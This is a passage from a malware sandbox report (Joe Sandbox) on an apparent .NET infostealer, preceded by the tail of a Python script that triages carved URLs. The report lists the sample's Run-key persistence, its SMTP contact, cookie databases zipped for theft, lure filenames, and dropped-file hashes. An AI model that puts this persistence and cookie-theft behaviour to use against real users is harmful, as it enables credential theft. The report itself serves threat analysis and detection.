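    trimmed; that is acceptable for a triage heuristic and worth knowing about.
    """
    labels = urlsplit(url).netloc.split(".")
    for i in range(len(labels) - 1, 0, -1):  # never treat the first label as a TLD
        label = labels[i].lower()
        for tld in KNOWN_TLDS:
            if label.startswith(tld):
                return ".".join(part.lower() for part in labels[:i]) + "." + tld
    return None


def registrable(host):
    """Registrable domain: last two labels, or three under com.cn / co.kr style suffixes."""
    parts = host.split(".")
    use_three = len(parts) >= 3 and len(parts[-1]) == 2 and parts[-2] in ("com", "co")
    return ".".join(parts[-3:] if use_three else parts[-2:])


def triage(urls):
    noise, candidates, unrecoverable = set(), set(), []
    for url in urls:
        host = carved_host(url)
        if host is None:
            unrecoverable.append(url)  # no TLD label survived the carving
            continue
        domain = registrable(host)
        (noise if domain in FOUNDRY_NOISE else candidates).add(domain)
    return {"noise": sorted(noise), "candidates": sorted(candidates), "unrecoverable": unrecoverable}


if __name__ == "__main__":
    for key, value in triage(CARVED).items():
        print(key, value)
```

On the constructed subset, twelve carved strings reduce to six foundry domains, two unrecoverable fragments (www.founder.cT, www.m.) and a single candidate, eu0j0ejpmgs9.com, which is also the one entry the report marks as a contacted URL.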

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
us2.smtp.mailhostbox.com | 208.91.198.143 | true | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://eu0j0ejPMgs9.com | true | Avira URL Cloud: safe | unknown
                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.fontbureau.com/designersGsample2.exe, 00000000.00000003.649192807.0000000005045000.00000004.00000001.sdmp, sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                      high
                      http://www.fontbureau.comI.TTFsample2.exe, 00000000.00000003.649363101.0000000005014000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.fontbureau.com/designers/?sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                        high
                        http://www.founder.com.cn/cn/bThesample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designers?sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                          high
                          http://www.carterandcone.comepsample2.exe, 00000000.00000003.644898716.000000000504E000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.tiro.com.sample2.exe, 00000000.00000003.642985385.000000000502B000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.fontbureau.com/designers/frere-user.htmltF1sample2.exe, 00000000.00000003.648321789.0000000005049000.00000004.00000001.sdmpfalse
                            high
                            http://www.tiro.comnwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designersnwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                              high
                              http://www.fonts.comicxsample2.exe, 00000000.00000003.642811892.000000000502B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.comuecsample2.exe, 00000000.00000002.662931155.0000000005010000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.com/designersZsample2.exe, 00000000.00000003.647892711.0000000005049000.00000004.00000001.sdmpfalse
                                high
                                http://www.goodfont.co.krsample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.carterandcone.comsample2.exe, 00000000.00000003.645220057.000000000504E000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.sajatypeworks.comsample2.exe, 00000000.00000003.642725281.000000000502B000.00000004.00000001.sdmp, sample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.sajatypeworks.comKsample2.exe, 00000000.00000003.642725281.000000000502B000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.typography.netDsample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.founder.com.cn/cn/cThesample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.galapagosdesign.com/staff/dennis.htmsample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://fontfabrik.comsample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designerserssample2.exe, 00000000.00000003.647942862.0000000005049000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.galapagosdesign.com/DPleasesample2.exe, 00000000.00000002.665763058.00000000062C2000.00000004.00000001.sdmp, nwama.exe, 0000000A.00000002.723643574.00000000053F0000.00000002.00000001.sdmp, nwama.exe, 0000000F.00000002.739580757.0000000005560000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.comM.TTFNsample2.exe, 00000000.00000003.649363101.0000000005014000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown

                                                  Contacted IPs

                                                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
208.91.198.143 | unknown | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false

                                                  Private

                                                  IP
                                                  192.168.2.1

                                                  General Information

                                                  Joe Sandbox Version:31.0.0 Red Diamond
                                                  Analysis ID:339443
                                                  Start date:14.01.2021
                                                  Start time:03:36:51
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 12m 25s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:sample2.bin (renamed file extension from bin to exe)
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:27
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@18/10@3/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 0.1% (good quality ratio 0%)
                                                  • Quality average: 0%
                                                  • Quality standard deviation: 0%
                                                  HCA Information:
                                                  • Successful, ratio: 92%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  Warnings:
                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                  • TCP Packets have been reduced to 100
                                                  • Excluded IPs from analysis (whitelisted): 168.61.161.212, 52.255.188.83, 51.104.144.132, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129, 67.27.157.126, 67.27.157.254, 8.253.207.120, 8.248.139.254, 8.248.117.254, 51.104.139.180
                                                  • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/339443/sample/sample2.exe

                                                  Simulations

                                                  Behavior and APIs

Time | Type | Description
03:37:59 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run nwama C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
03:38:07 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run nwama C:\Users\user\AppData\Local\Temp\nwama\nwama.exe

                                                  Joe Sandbox View / Context

                                                  IPs

Match: 208.91.198.143

Associated Sample Name / URL | Detection
invoice No 8882.exe | malicious
DHL Delivery Confirmation.exe | malicious
Verify Email.exe | malicious
Statement of Account.doc | malicious
vsl particulars.exe | malicious
DHL Shipment Documents.exe | malicious
suk1MHq6DK.exe | malicious
Swift_advise.xlsx | malicious
DETALLE DE PAGOS EFECTUADOS (DETAIL OF PAYMENTS.exe | malicious
CHEMEX DUBAI.exe | malicious
December_Document_.doc | malicious
SR 16-30 nOV-2020 GULF AIR.exe | malicious
HSBCWE1123.exe | malicious
MT#4000189.exe | malicious
Purchase Order.exe | malicious
AL UAE.exe | malicious
Customer Order, Images, Spec.exe | malicious
file.exe | malicious
Quotation.exe | malicious
PMA1911003.doc | malicious

                                                                                          Domains

Match: us2.smtp.mailhostbox.com

Associated Sample Name / URL | Detection | Context (resolved IP)
Quotation.exe | malicious | 208.91.199.223
Booking.exe | malicious | 208.91.199.223
MV. Double Miracle.exe | malicious | 208.91.199.225
MV Double Miracle.exe | malicious | 208.91.199.224
C.V. - application letter.exe | malicious | 208.91.199.223
PO-SOT215006A.exe | malicious | 208.91.199.224
AWB & Shipping Document.exe | malicious | 208.91.199.225
invoice No 8882.exe | malicious | 208.91.199.224
Shipping document.exe | malicious | 208.91.199.225
Y3fwLpzaXNZPaT6.exe | malicious | 208.91.199.223
XyZQ7im2Dv.exe | malicious | 208.91.199.223
FB-108N & FB-108NK #U8a62#U50f9 - #U7530#U52e4.exe | malicious | 208.91.199.223
Ldz62seIo3.exe | malicious | 208.91.199.225
VPAPvqgfkf.exe | malicious | 208.91.199.225
TTR payment amount 131,000 USD.xlsx | malicious | 208.91.199.225
ESrYdvhNfV.exe | malicious | 208.91.199.223
DHL Delivery Confirmation.exe | malicious | 208.91.198.143
KBC Enquiry No.20201228.xlsx | malicious | 208.91.199.223
LR8meXRan7.exe | malicious | 208.91.199.223
Proforma Invoice.exe | malicious | 208.91.199.223

                                                                                          ASN

Match: PUBLIC-DOMAIN-REGISTRYUS

Associated Sample Name / URL | Detection | Context (contacted IP)
JAAkR51fQY.exe | malicious | 216.10.246.131
Quotation.exe | malicious | 208.91.199.223
Doc_18420540.doc | malicious | 103.76.228.18
Booking.exe | malicious | 208.91.199.223
MV. Double Miracle.exe | malicious | 208.91.199.225
MV Double Miracle.exe | malicious | 208.91.199.224
RFQ0128SR20KWT_DEUNGJU_FAKRU_AND_NAVEED.exe | malicious | 162.222.225.57
C.V. - application letter.exe | malicious | 208.91.199.223
PO-SOT215006A.exe | malicious | 208.91.199.224
AWB & Shipping Document.exe | malicious | 208.91.199.223
invoice No 8882.exe | malicious | 208.91.199.224
Shipping document.exe | malicious | 208.91.199.225
Y3fwLpzaXNZPaT6.exe | malicious | 208.91.199.224
rib.exe | malicious | 208.91.199.108
XyZQ7im2Dv.exe | malicious | 208.91.199.223
FB-108N & FB-108NK #U8a62#U50f9 - #U7530#U52e4.exe | malicious | 208.91.199.223
Ldz62seIo3.exe | malicious | 208.91.199.225
VPAPvqgfkf.exe | malicious | 208.91.199.225
TTR payment amount 131,000 USD.xlsx | malicious | 208.91.199.225
ESrYdvhNfV.exe | malicious | 208.91.199.223

                                                                                          JA3 Fingerprints

                                                                                          No context

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\nwama.exe.log
                                                                                          Process:C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):665
                                                                                          Entropy (8bit):5.282361864518305
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70U20qcH8O0Ug+9Yz9tv:MLF20NaL329hJ5g522rW2Mz2T
                                                                                          MD5:C6F9162A813BFA011E86162EBFC31D27
                                                                                          SHA1:0E0D4813EEA11780E84BB0DF4EC7E4ABD95E182D
                                                                                          SHA-256:103C0E7E2CC42883AB3C546D495E92986E093838B7B33CAA6FDEC29005FB68F4
                                                                                          SHA-512:5BA5620C3208117794B2D9C28ACAEF44E87E77949EFBA61146EF394D2198B91364465407E54859644EDA626F72F311D66C2E12AB6FB706CE1AC94C8152FC6A9E
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.DirectorySer#\ec97af4da869bf56e9dc343bba24999d\System.DirectoryServices.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\sample2.exe.log
                                                                                          Process:C:\Users\user\Desktop\sample2.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):665
                                                                                          Entropy (8bit):5.282361864518305
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70U20qcH8O0Ug+9Yz9tv:MLF20NaL329hJ5g522rW2Mz2T
                                                                                          MD5:C6F9162A813BFA011E86162EBFC31D27
                                                                                          SHA1:0E0D4813EEA11780E84BB0DF4EC7E4ABD95E182D
                                                                                          SHA-256:103C0E7E2CC42883AB3C546D495E92986E093838B7B33CAA6FDEC29005FB68F4
                                                                                          SHA-512:5BA5620C3208117794B2D9C28ACAEF44E87E77949EFBA61146EF394D2198B91364465407E54859644EDA626F72F311D66C2E12AB6FB706CE1AC94C8152FC6A9E
                                                                                          Malicious:true
                                                                                          Reputation:low
                                                                                          Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.DirectorySer#\ec97af4da869bf56e9dc343bba24999d\System.DirectoryServices.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
                                                                                          C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                                                                                          Process:C:\Users\user\Desktop\sample2.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):608768
                                                                                          Entropy (8bit):7.046672193911453
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:o+zgiqlYVUUJiotHw9c93n5zzsO1E48Mjr0J42lX:bl3xScRRz71Eowim
                                                                                          MD5:B0F2D519CCAE5BF1435264E0979770CE
                                                                                          SHA1:212DA7B3ED9C89D83941F6BB0DBA889FA24F8F6A
                                                                                          SHA-256:A4FDC26D6B70EAF0A62CCA36286412901F48881EAE616D38B96D8AE0CB0F29C7
                                                                                          SHA-512:A50B9D27ABDF6195A2689FF911E11CBC6F71CBF69D1872C765A9FC92B3A2A8E2717E260C76D1C91576D59F6B105A27B1CCCC6056251DC80A0DC8AFECBFF3507C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Metadefender, Detection: 30%
                                                                                          • Antivirus: ReversingLabs, Detection: 81%
                                                                                          Reputation:low
                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8..^..............0..@..........._... ...`....@.. ....................................@.................................D_..O....`............................................................................... ............... ..H............text....?... ...@.................. ..`.rsrc........`.......B..............@..@.reloc...............H..............@..B................x_......H........d...............U..............................................".(.....*.r...p.....*B.(.......(....&*...0..O........s........A...%.. .o..........+............(.....o....&...X....i2..o......+...*..0...........r-..p..o ....+..*...0..F.........r0..pr4..po!....s"..........+{...o#........(..........._.0..+...o$........_.0..+...o$........_.0..+...o$........_.0..+...o$........_.0..+...o$........X.....o%...?x...s".......+s.....o&....b....Xo&....bX....Xo&....bX....Xo&....bX..
                                                                                          C:\Users\user\AppData\Local\Temp\nwama\nwama.exe:Zone.Identifier
                                                                                          Process:C:\Users\user\Desktop\sample2.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):26
                                                                                          Entropy (8bit):3.95006375643621
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                          Malicious:true
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview: [ZoneTransfer]....ZoneId=0
                                                                                          C:\Users\user\AppData\Roaming\1b4bluf2.tug.zip
                                                                                          Process:C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                          Category:dropped
                                                                                          Size (bytes):1468
                                                                                          Entropy (8bit):7.131875428158717
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:98MoAushnKsCT40V6MCY8xWG3BSg8lom/Z8IgRk8cDj8D6tDf7uEeNYJKv8WWf6Q:98MoAhhKl/VDCvx93BSg0thdgRkxJtDL
                                                                                          MD5:535BCBE2A74CFC076571E4D66FD063DA
                                                                                          SHA1:4F9BD7425ED0B967D816538A89B916B61265694A
                                                                                          SHA-256:9AF280DBB1847681C487FA67A7D0A4FA5E672883D1E9C8BC310AFEAB79F3B6F8
                                                                                          SHA-512:6A8E45822D0A46F734704EA88C73A9A56C84FD682B6905F2AAEDB6707CD2B1AC251B996A61DE6F6570EEC57B073FE2308CB5FBE175FBACDEAEAEEB4336A19379
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview: PK.........K>Q............#...1b4bluf2.tug/Chrome/Default/Cookies..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"^......^dmz....~._...5~.4.5~._.......{~-......kz..=...1>........5~..8.5~..._.......~.......G...=?z~...........~._...m.......~.6.......y.?~..W..oN.7.O...............g/.~~.*}....W...U...o........}...y..\w?[e..Q.nU.y..h~.&...<..mW....Yf.e6.....y....s.......Iw..*...i.e......h..xm..^......<y..........a.hv......4....<_lh.3....O|u.n......Q.).sg....~......5..,.........u[....................e.Z.m...Z....-p../_|...N.}.!..|u....'..N..Q*d.......~...z.-....._......7.....?.k....o....=?z~.......G...=?z~.......G..+........s..L..%'.J0...H.T.....................E....6k...n.k .........M....?....=?z~.......G...=?z~.......G....;....@.....................2..1..k.&..A.....G...=?z~.......G...=?z....!......z?.[....c?F...?t.7.5.....o....?._T.E..).~q...q.w../....../ww............?.[........7i..
                                                                                          C:\Users\user\AppData\Roaming\1b4bluf2.tug\Chrome\Default\Cookies
                                                                                          Process:C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.7006690334145785
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                          MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                          SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                          SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                          SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          C:\Users\user\AppData\Roaming\j0jrvzzu.5ob.zip
                                                                                          Process:C:\Users\user\Desktop\sample2.exe
                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                          Category:modified
                                                                                          Size (bytes):1468
                                                                                          Entropy (8bit):7.131021182385188
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:98MKJushnKsCT40V6MCY8xWG3BSg8lom/Z8IgRk8cDj8D6tDf7uEeNYJKv8WWf6P:98MKJhhKl/VDCvx93BSg0thdgRkxJtDo
                                                                                          MD5:8322041C86EA6665C4EE21EA7F53B761
                                                                                          SHA1:2EEE1280B95080FFA5463A9D1DA9914D07DC135E
                                                                                          SHA-256:1234B9AC16387AEAD74BF68107E1814A73D9DB83D1A40D3E12A37285097CE84F
                                                                                          SHA-512:324FB84610034CF7C4887768B0215CEB1A82FEF6EC92FAA3EA304DD81E90F40CBD1925F5720CA467F101249EFA96CFA49C22B896CFCAE909B6A98DF4D0780D32
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview: PK.........K>Q............#...j0jrvzzu.5ob/Chrome/Default/Cookies..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"^......^dmz....~._...5~.4.5~._.......{~-......kz..=...1>........5~..8.5~..._.......~.......G...=?z~...........~._...m.......~.6.......y.?~..W..oN.7.O...............g/.~~.*}....W...U...o........}...y..\w?[e..Q.nU.y..h~.&...<..mW....Yf.e6.....y....s.......Iw..*...i.e......h..xm..^......<y..........a.hv......4....<_lh.3....O|u.n......Q.).sg....~......5..,.........u[....................e.Z.m...Z....-p../_|...N.}.!..|u....'..N..Q*d.......~...z.-....._......7.....?.k....o....=?z~.......G...=?z~.......G..+........s..L..%'.J0...H.T.....................E....6k...n.k .........M....?....=?z~.......G...=?z~.......G....;....@.....................2..1..k.&..A.....G...=?z~.......G...=?z....!......z?.[....c?F...?t.7.5.....o....?._T.E..).~q...q.w../....../ww............?.[........7i..
                                                                                          C:\Users\user\AppData\Roaming\j0jrvzzu.5ob\Chrome\Default\Cookies
                                                                                          Process:C:\Users\user\Desktop\sample2.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.7006690334145785
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                          MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                          SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                          SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                          SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                          Malicious:false
                                                                                          Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          C:\Users\user\AppData\Roaming\y2nzgw3x.tiq.zip
                                                                                          Process:C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                          Category:dropped
                                                                                          Size (bytes):1468
                                                                                          Entropy (8bit):7.128952402557935
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:98MtBushnKsCT40V6MCY8xWG3BSg8lom/Z8IgRk8cDj8D6tDf7uEeNYJKv8WWf6K:98MfhhKl/VDCvx93BSg0thdgRkxJtDzx
                                                                                          MD5:ECA5AA866F8DCF612B56EE50A2EFB2A4
                                                                                          SHA1:12046CB3FB5A2E112603EB67C7D7413D6DBCE0CA
                                                                                          SHA-256:A23A81E9C35EF744F8D3F5FBCAB2DFFCDCB5231090BC0D4502A4776E33C55301
                                                                                          SHA-512:1C7D5827FD92BC05F7DB0889D40D8215C0F5E5F8AD88F5C149ECA44F80BEB241B20CCE7197758F881AB607E4A37E98A6F137FD48043EB77F35A6BA980D72A213
                                                                                          Malicious:false
